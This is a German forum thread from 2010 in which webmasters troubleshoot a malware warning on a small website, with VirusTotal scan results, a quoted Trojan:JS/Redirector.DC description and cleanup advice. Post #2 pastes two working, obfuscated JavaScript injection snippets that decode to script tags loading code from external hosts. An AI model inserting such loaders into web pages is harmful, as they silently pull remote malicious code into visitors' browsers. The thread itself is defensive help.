Virus auf der Seite

Gehe zu Seite:

Geschlossen

Di. 27.07.2010 17:34 Uhr #1

Remix Mitglied

Registriert seit
28.02.2009

Beiträge
267

Beitragswertungen

Hallo liebe ilch- Gemeinde.

Unterstütze seit Längeren einen Freund bei der Ersellung und Pflege seiner Seite. Heute meinte ein Benutzer, dass er aufgrund einer Malware Warnung nicht auf die Seite zugreifen kann. Hier die Meldung:

Trend Micro OfficeScan Ereignis

URL gesperrt

Der URL, auf den Sie zugreifen möchten, stellt ein mögliches Sicherheitsrisiko dar. Zur Einhaltung der Netzwerk-Sicherheitsrichtlinie hat Trend Micro OfficeScan den URL gesperrt.

URL: externer Link

Risikostufe:
Hoch

Details: Unter reclassify.wrs.trendmicro.com finden Sie weitere Informationen über diesen URL und können ihn zur erneuten Einstufung melden.

Hier der Link dazu:

reclassify.wrs.trendmicro.com/wrsonlinequery.aspx?url=http%3a%2f%2fwww.hsgeller.bplaced.net%2f

anschließend habe ich noch eine Seite gefunden, mit deren Hilfe sich über den Quelltext ein Virus aufspüren lässt. Hier das Ergebnis:

Antivirus Version letzte aktualisierung Ergebnis
AhnLab-V3 2010.07.27.00 2010.07.26 -
AntiVir 8.2.4.26 2010.07.27 -
Antiy-AVL 2.0.3.7 2010.07.26 -
Authentium 5.2.0.5 2010.07.27 -
Avast 4.8.1351.0 2010.07.27 -
Avast5 5.0.332.0 2010.07.27 -
AVG 9.0.0.851 2010.07.27 -
BitDefender 7.2 2010.07.27 -
CAT-QuickHeal 11.00 2010.07.27 -
ClamAV 0.96.0.3-git 2010.07.27 PUA.HTML.Infected.WebPage-2 Comodo 5556 2010.07.27 -
DrWeb 5.0.2.03300 2010.07.27 -
Emsisoft 5.0.0.34 2010.07.27 -
eSafe 7.0.17.0 2010.07.26 -
eTrust-Vet 36.1.7742 2010.07.27 -
F-Prot 4.6.1.107 2010.07.27 -
F-Secure 9.0.15370.0 2010.07.27 -
Fortinet 4.1.143.0 2010.07.24 -
GData 21 2010.07.27 -
Ikarus T3.1.1.84.0 2010.07.27 -
Jiangmin 13.0.900 2010.07.26 -
Kaspersky 7.0.0.125 2010.07.27 -
McAfee 5.400.0.1158 2010.07.27 -
McAfee-GW-Edition 2010.1 2010.07.27 -
Microsoft 1.6004 2010.07.27 -
NOD32 5317 2010.07.27 -
Norman 6.05.11 2010.07.27 -
nProtect 2010-07-27.01 2010.07.27 -
Panda 10.0.2.7 2010.07.27 -
PCTools 7.0.3.5 2010.07.27 -
Prevx 3.0 2010.07.27 -
Rising 22.58.01.04 2010.07.27 -
Sophos 4.55.0 2010.07.27 -
Sunbelt 6647 2010.07.27 -
SUPERAntiSpyware 4.40.0.1006 2010.07.27 -
Symantec 20101.1.1.7 2010.07.27 -
TheHacker 6.5.2.1.326 2010.07.27 -
TrendMicro 9.120.0.1004 2010.07.27 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.27 -
VBA32 3.12.12.6 2010.07.27 -
ViRobot 2010.7.24.3958 2010.07.27 -
VirusBuster 5.0.27.0 2010.07.27 -
weitere Informationen
File size: 87572 bytes
MD5...: bff1f80ca23a846df651be336ce47056
SHA1..: 1a69c8fcac60c7ff35a8229ab7c1aacc975bf048
SHA256: d4068eefc04c29035ff618e43723daf180907541ca0164854d232b4db7d00e4e
ssdeep: 768:STRVrSPhBOLAkCQMd7xvoSDTEi7CzafWDYt8DFhqm5NZbUW:STRVrSPhdk5x
SDTEi7OkqxP

PEiD..: -
PEInfo: -
RDS...: NSRL Reference Data Set
-
pdfid.: -
trid..: HyperText Markup Language with DOCTYPE (80.6%)
HyperText Markup Language (19.3%)
sigcheck:
publisher....: n/a
copyright....: n/a
product......: n/a
description..: n/a
original name: n/a
internal name: n/a
file version.: n/a
comments.....: n/a
signers......: -
signing date.: -
verified.....: Unsigned

packers (F-Prot): eval

Wäre schön, wenn ihr mir hier helfen könntet, weiß nicht was ich machen soll

Google sagt das:

Ratgeber - bereitgestellt von
Safe Browsing
Diagnoseseite für www.hsgeller.bplaced.net
Wie ist die gegenwärtige Einstufung von www.hsgeller.bplaced.net?

Diese Website ist gegenwärtig nicht als verdächtig eingestuft.

Welche Befunde hat Google beim Besuch dieser Website festgestellt?

Google hat diese Website in den letzten 90 Tagen nicht besucht.
Hat diese Website als Überträger zur Weiterverteilung von Malware fungiert?

In den letzten 90 Tagen hat www.hsgeller.bplaced.net anscheinend nicht als Überträger für die Infektion von Websites fungiert.

Hat diese Website Malware gehostet?

Nein, diese Website hat in den letzten 90 Tagen keine Malware gehostet.

Nächste Schritte:

Zur vorherigen Seite zurückkehren.
Falls Sie Eigner dieser Website sind, können Sie eine Überprüfung Ihrer Website mit den Google Webmaster-Tools anfordern. Weitere Informationen über den Prüfprozess erhalten Sie in der Hilfe für Webmaster.
Updated 7 hours ago

Zuletzt modifiziert von Remix am 27.07.2010 - 17:40:28

www.fsk-anticlan.de --> www.revival.4playin.de
0 Mitglieder finden den Beitrag gut.
- zitieren

Di. 27.07.2010 18:15 Uhr #2

Botox84 Mitglied

Schaue die Index datein durch zwinker

Da gibts garantiert son code oder ähnlich^^

<script type="text/javascript">var nhZE2uSD="Ow8xN18Ow8xN31";var usW1446O0="Ow8xN3cOw8xN73Ow8xN63Ow8xN72"; var usW1446O1="Ow8xN69Ow8xN70Ow8xN74Ow8xN20"; var usW1446O2="Ow8xN74Ow8xN79Ow8xN70Ow8xN65"; var usW1446O3="Ow8xN3dOw8xN22Ow8xN74Ow8xN65"; var usW1446O4="Ow8xN78Ow8xN74Ow8xN2fOw8xN6a"; var usW1446O5="Ow8xN61Ow8xN76Ow8xN61Ow8xN73"; var usW1446O6="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O7="Ow8xN74Ow8xN22Ow8xN20Ow8xN73"; var usW1446O8="Ow8xN72Ow8xN63Ow8xN3dOw8xN22"; var usW1446O9="Ow8xN68Ow8xN74Ow8xN74Ow8xN70"; var usW1446O10="Ow8xN3aOw8xN2fOw8xN2fOw8xN61"; var usW1446O11="Ow8xN6eOw8xN6eOw8xN6fOw8xN75"; var usW1446O12="Ow8xN2eOw8xN73Ow8xN65Ow8xN72"; var usW1446O13="Ow8xN76Ow8xN65Ow8xN68Ow8xN74"; var usW1446O14="Ow8xN74Ow8xN70Ow8xN2eOw8xN63"; var usW1446O15="Ow8xN6fOw8xN6dOw8xN2fOw8xN2f"; var usW1446O16="Ow8xN6dOw8xN6cOw8xN2eOw8xN70"; var usW1446O17="Ow8xN68Ow8xN70Ow8xN22Ow8xN3e"; var usW1446O18="Ow8xN20Ow8xN3cOw8xN2fOw8xN73"; var usW1446O19="Ow8xN63Ow8xN72Ow8xN69Ow8xN70"; var usW1446O20="Ow8xN74Ow8xN3e"; var JgUg10US="g4Uuq18Ow8xN31";var Q8NVsUq5=usW1446O0+usW1446O1+usW1446O2+usW1446O3+usW1446O4+usW1446O5+usW1446O6+usW1446O7+usW1446O8+usW1446O9+usW1446O10+usW1446O11+usW1446O12+usW1446O13+usW1446O14+usW1446O15+usW1446O16+usW1446O17+usW1446O18+usW1446O19+usW1446O20; CvhvkAeR=Q8NVsUq5.replace(/Ow8xN/g,"%");var KcQGBJKD=unescape;var nhZE2uSD="cZLH618g4Uuq31";q9124=this;var WrEGuKeo=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];WrEGuKeo.write(KcQGBJKD(CvhvkAeR));</script><script type="text/javascript">var yUyzuXFB="STgZJ15STgZJ34";var QrroeOFm0="STgZJ3cSTgZJ73STgZJ63STgZJ7"; var QrroeOFm1="2STgZJ69STgZJ70STgZJ74STgZJ"; var QrroeOFm2="20STgZJ74STgZJ79STgZJ70STgZ"; var QrroeOFm3="J65STgZJ3dSTgZJ22STgZJ74STg"; var QrroeOFm4="ZJ65STgZJ78STgZJ74STgZJ2fST"; var QrroeOFm5="gZJ6aSTgZJ61STgZJ76STgZJ61S"; var QrroeOFm6="TgZJ73STgZJ63STgZJ72STgZJ69"; var QrroeOFm7="STgZJ70STgZJ74STgZJ22STgZJ2"; var QrroeOFm8="0STgZJ73STgZJ72STgZJ63STgZJ"; var QrroeOFm9="3dSTgZJ22STgZJ68STgZJ74STgZ"; var QrroeOFm10="J74STgZJ70STgZJ3aSTgZJ2fSTg"; var QrroeOFm11="ZJ2fSTgZJ61STgZJ6eSTgZJ65ST"; var QrroeOFm12="gZJ77STgZJ77STgZJ2eSTgZJ73S"; var QrroeOFm13="TgZJ65STgZJ72STgZJ76STgZJ65"; var QrroeOFm14="STgZJ62STgZJ6cSTgZJ6fSTgZJ6"; var QrroeOFm15="7STgZJ2eSTgZJ6eSTgZJ65STgZJ"; var QrroeOFm16="74STgZJ2fSTgZJ2fSTgZJ6dSTgZ"; var QrroeOFm17="J6cSTgZJ2eSTgZJ70STgZJ68STg"; var QrroeOFm18="ZJ70STgZJ22STgZJ3eSTgZJ20ST"; var QrroeOFm19="gZJ3cSTgZJ2fSTgZJ73STgZJ63S"; var QrroeOFm20="TgZJ72STgZJ69STgZJ70STgZJ74"; var QrroeOFm21="STgZJ3e"; var FK8meouU="PpT0s15STgZJ34";var mWZQF2Dj=QrroeOFm0+QrroeOFm1+QrroeOFm2+QrroeOFm3+QrroeOFm4+QrroeOFm5+QrroeOFm6+QrroeOFm7+QrroeOFm8+QrroeOFm9+QrroeOFm10+QrroeOFm11+QrroeOFm12+QrroeOFm13+QrroeOFm14+QrroeOFm15+QrroeOFm16+QrroeOFm17+QrroeOFm18+QrroeOFm19+QrroeOFm20+QrroeOFm21; WlLIgEcn=mWZQF2Dj.replace(/STgZJ/g,"%");var OlR0FQYF=unescape;var yUyzuXFB="MTcxj15PpT0s34";q9124=this;var rQ5voJh9=q9124["WYd1GoGYc2uG1mYGe2YnltY".replace(/[Y12WlG\:]/g, "")];rQ5voJh9.write(OlR0FQYF(WlLIgEcn));</script>

Ich will auf die Seite nicht drauf gehen um zu gucken, lade du alle index datein runter und schau in den code^^

Zuletzt modifiziert von Botox84 am 27.07.2010 - 18:15:46

Chat Roulette Chatroulette Baushop

0 Mitglieder finden den Beitrag gut.

zitieren

Di. 27.07.2010 18:52 Uhr #3

Remix Mitglied

Registriert seit
28.02.2009

Beiträge
267

Beitragswertungen

Hi Botox,

danke schon mal für Deine Antwort. Habe eben alle Index Dateien durchgeschaut, aber keinen Code in dieser Richtung gefunden.

Also mal weiter suchen!

Komisch ist das ja Alles schon :-(

www.fsk-anticlan.de --> www.revival.4playin.de
0 Mitglieder finden den Beitrag gut.
- zitieren
Di. 27.07.2010 22:42 Uhr #4

CeeJay Hall Of Fame

Registriert seit
23.03.2007

Beiträge
2.425

Beitragswertungen

Details: Unter reclassify.wrs.trendmicro.com finden Sie weitere Informationen über diesen URL und können ihn zur erneuten Einstufung melden.

Das würde ich mal auf jeden Fall tun.
Hatte so ein ähnliches Problem mit meinen Emailserver. Anscheinend hatte der Hoster mit seiner Domain Spammails versendet, weshalb dann alle Kunden, deren Server unter seiner Domain lagen, gleich mit als Spam in ein Registar eingestuft wurden. Man kann dann manuelle Freischaltlinks eintragen bzw. Websiten übermitteln und zur Prüfung einsenden.

Ansonsten mal schauen, ob i.welche Warez oder Ähnliches auf dem Webspace vorhanden ist, meistens sind Keygens oder Cracks als Viren eingestuft bzw. sie können es auch wirklich sein.

Nichts ist so sicher, wie die Änderung.
0 Mitglieder finden den Beitrag gut.
- zitieren
Di. 27.07.2010 23:11 Uhr #5

LittleBIGFan Mitglied

Registriert seit
28.11.2009

Beiträge
314

Beitragswertungen

Virus: JS:Redirector-DC [Trj] (Engine B)

Es wurde versucht, auf eine infizierte
Datei zuzugreifen.

Datei: _1.fdt

Sagt mein GData...

externer Link Guardians of the Relic
0 Mitglieder finden den Beitrag gut.
- zitieren
Mi. 28.07.2010 05:43 Uhr #6

Remix Mitglied

Registriert seit
28.02.2009

Beiträge
267

Beitragswertungen

Na super. Und wie entferne ich das Teil, bzw. wo befindet es sich?

www.fsk-anticlan.de --> www.revival.4playin.de
0 Mitglieder finden den Beitrag gut.
- zitieren
Mi. 28.07.2010 12:42 Uhr #7

LittleBIGFan Mitglied

Registriert seit
28.11.2009

Beiträge
314

Beitragswertungen

Keine Ahnung aber das Teil is dreckig und speichert Ableger als F1 Dateien im Browserverlauf...

externer Link Guardians of the Relic
0 Mitglieder finden den Beitrag gut.
- zitieren
Mi. 28.07.2010 14:26 Uhr #8

CeeJay Hall Of Fame

Registriert seit
23.03.2007

Beiträge
2.425

Beitragswertungen

Zitat geschrieben von LittleBIGFan

Virus: JS:Redirector-DC [Trj] (Engine B)

Es wurde versucht, auf eine infizierte
Datei zuzugreifen.

Datei: _1.fdt

Sagt mein GData...

Dazu habe ich folgendes gefunden:

Aliases :

Trojan:JS/Redirector.DC is also known as HTML/Redirector (AhnLab), JS/Pegel.E.9 (Avira), Trojan.JS.Redirector.ag (BitDefender), JS.Redirector.based.3 (Dr.Web), JS/TrojanDownloader.Pegel.AV (ESET), JS/Redirector.u (McAfee), HTML/Redir.BH (Norman), Troj/JSRedir-BD (Sophos), Trojan-Downloader.HTML.Agent.k (Sunbelt Software), JS_KEMPAR.SM (Trend Micro).
Explanation :

Trojan:JS/Redirector.DC is a detection for an obfuscated script that attempts to redirect the browser to the Web site "bestdarkstar.info".
Top

Trojan:JS/Redirector.DC is a detection for an obfuscated script that attempts to redirect the browser to the Web site "bestdarkstar.info". InstallationThe trojan may be encountered when browsing a Web page containing the script. The trojan could redirect a Web browser to the site "bestdarkstar.info". At the time of this writing, the requested URL was not available.

---------Das heisst...

Anscheinend handelt es sich um einen Trojaner, der deine Website auf "bestdarkstar.info" umleitet, das ganze als JavaScript in irgendeiner deiner *.htm - Dateien integriert (möglicherweise). Von meinem Domainhoster weiss ich allerdings auch, das die reine Domainweiterleitung durch den Domainhoster geschehen kann, also ist es schwer zu sagen, ob du das Script auf einer deiner Dateien hast oder ob das Script bei deinem Domainhoster liegt...

---------Fazit:

Ich würde jetzt meine kompletten Scriptdateien herunterladen (inklusive SelvB/P-Dateien und index.htm bzw. css vom Design), die dann komplett durchforsten nach:

-bestdarkstar
-JS/Redirector
-Redirector

wenn die Suchbegriffe bei dir nicht auftauchen, würde ich meinen Domainhoster kontaktieren.

LG

Nichts ist so sicher, wie die Änderung.
0 Mitglieder finden den Beitrag gut.
- zitieren
Do. 29.07.2010 10:43 Uhr #9

Remix Mitglied

Registriert seit
28.02.2009

Beiträge
267

Beitragswertungen

Ich geh kaputt! Nichts zu finden! Nervt nur noch! Mache die Seite platt und sag meinem Kumpel, dass es nicht anders ging.

Habe jetzt alle Dateien durchwühlt und nun dicke Augen. Entweder bin ich blind, oder ich bin zu blöd etwas zu finden.
Habe keinen Ansatz wie ich weiter vorgehen soll, menno!

.. sehe gerade, die cc.-Datei habe ich noch nicht beackert! Mal schauen, ob ich da mehr Erfolg habe.

Wenn noch jemand ne "rettende" Idee hat, bitte fleißig posten. Bin, ehrlich gesagt, ratlos

www.fsk-anticlan.de --> www.revival.4playin.de
0 Mitglieder finden den Beitrag gut.
- zitieren
Do. 29.07.2010 14:23 Uhr #10

LittleBIGFan Mitglied

Registriert seit
28.11.2009

Beiträge
314

Beitragswertungen

Zitat geschrieben von Remix

Ich geh kaputt! Nichts zu finden! Nervt nur noch! Mache die Seite platt und sag meinem Kumpel, dass es nicht anders ging.

Habe jetzt alle Dateien durchwühlt und nun dicke Augen. Entweder bin ich blind, oder ich bin zu blöd etwas zu finden.
Habe keinen Ansatz wie ich weiter vorgehen soll, menno!

.. sehe gerade, die cc.-Datei habe ich noch nicht beackert! Mal schauen, ob ich da mehr Erfolg habe.

Wenn noch jemand ne "rettende" Idee hat, bitte fleißig posten. Bin, ehrlich gesagt, ratlos

Hast du ein älteres Backup von deinem webspace? Wenn ja amchste folgendes..

.. alles aus deinem webspace auf den pc laden.
.. in den dateien vom alten backup alles einsetzen und hinzufügen was du vom alten backup bis jetzt verändert hast (per hand!!)

.. dann webspace komplett leeren und altes backup reinladen

externer Link Guardians of the Relic
0 Mitglieder finden den Beitrag gut.
- zitieren
Do. 29.07.2010 18:41 Uhr #11

Remix Mitglied

Registriert seit
28.02.2009

Beiträge
267

Beitragswertungen

haben wir es jetzt?

Virus Total:

AhnLab-V3 2010.07.29.00 2010.07.28 -
AntiVir 8.2.4.32 2010.07.29 -
Antiy-AVL 2.0.3.7 2010.07.29 -
Authentium 5.2.0.5 2010.07.29 -
Avast 4.8.1351.0 2010.07.29 -
Avast5 5.0.332.0 2010.07.29 -
AVG 9.0.0.851 2010.07.29 -
BitDefender 7.2 2010.07.29 -
CAT-QuickHeal 11.00 2010.07.29 -
ClamAV 0.96.0.3-git 2010.07.29 -
Comodo 5581 2010.07.29 -
DrWeb 5.0.2.03300 2010.07.29 -
Emsisoft 5.0.0.34 2010.07.29 -
eSafe 7.0.17.0 2010.07.29 -
eTrust-Vet 36.1.7748 2010.07.29 -
F-Prot 4.6.1.107 2010.07.29 -
F-Secure 9.0.15370.0 2010.07.29 -
Fortinet 4.1.143.0 2010.07.29 -
GData 21 2010.07.29 -
Ikarus T3.1.1.84.0 2010.07.29 -
Jiangmin 13.0.900 2010.07.29 -
Kaspersky 7.0.0.125 2010.07.29 -
McAfee 5.400.0.1158 2010.07.29 -
McAfee-GW-Edition 2010.1 2010.07.29 -
Microsoft 1.6004 2010.07.29 -
NOD32 5323 2010.07.29 -
Norman 6.05.11 2010.07.29 -
nProtect 2010-07-29.01 2010.07.29 -
Panda 10.0.2.7 2010.07.29 -
PCTools 7.0.3.5 2010.07.29 -
Prevx 3.0 2010.07.29 -
Rising 22.58.03.04 2010.07.29 -
Sophos 4.55.0 2010.07.29 -
Sunbelt 6659 2010.07.29 -
SUPERAntiSpyware 4.40.0.1006 2010.07.29 -
Symantec 20101.1.1.7 2010.07.29 -
TheHacker 6.5.2.1.326 2010.07.27 -
TrendMicro 9.120.0.1004 2010.07.29 -
TrendMicro-HouseCall 9.120.0.1004 2010.07.29 -
VBA32 3.12.12.6 2010.07.28 -
ViRobot 2010.7.29.3963 2010.07.29 -
VirusBuster 5.0.27.0 2010.07.29 -

^^ keine Warnung mehr

This page seems to be <clean>
Would you like to check other pages?
@Webmaster: This is not a definitive test. Check the report below. Maybe you can spot some suspicious details there.

For more comprehensive diagnostics consider the following additional tests.

Website security is an ongoing process. Bookmark this service and check your web pages regularly.

Report
General

www.fsk-anticlan.de --> www.revival.4playin.de
0 Mitglieder finden den Beitrag gut.
- zitieren

Beitrag zur Merkliste hinzufügen

ilch Forum » Allgemein » HTML, PHP, SQL,... » Virus auf der Seite